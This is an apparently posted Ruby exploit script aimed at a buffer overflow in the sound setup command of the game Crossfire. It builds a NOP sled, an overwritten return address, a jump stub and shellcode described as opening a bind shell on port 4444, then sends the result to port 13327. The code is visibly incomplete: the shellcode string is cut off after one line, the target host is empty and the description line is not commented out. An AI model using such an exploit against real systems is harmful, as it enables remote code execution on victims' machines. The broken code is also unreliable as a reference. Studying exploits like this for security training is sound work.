Title: buffer_overflow scripts linux_bo_exploit.rbAuthor: ajayverma
#!/usr/bin/env ruby

This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0

#create shellcode
#creates a bind shell on port 4444
shellcode = "\xba\xe9\x41\x08\x31\xdb\xd3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"+

#create buffer to cause the crash
buffer = "\x90" * (4368 - 105)

#create eip value
eip = "\x97\x45\x13\x08"

#create stage one
stage_one = "\x83\xC0\x0C\xFF\xE0"

#create padding
padding = "\x90" * (4379 - 4368 - 4 - 5)

#assemble payload
payload = "\x11(setup sound " + shellcode + buffer + eip + stage_one + padding + "\x90\x00\#"

#send payload
puts "sending payload..."
socket = Socket.tcp("", 13327)
puts socket.gets.chomp
puts "payload sent... socket closed..."

Submitted On: 2019-06-25 10:11:50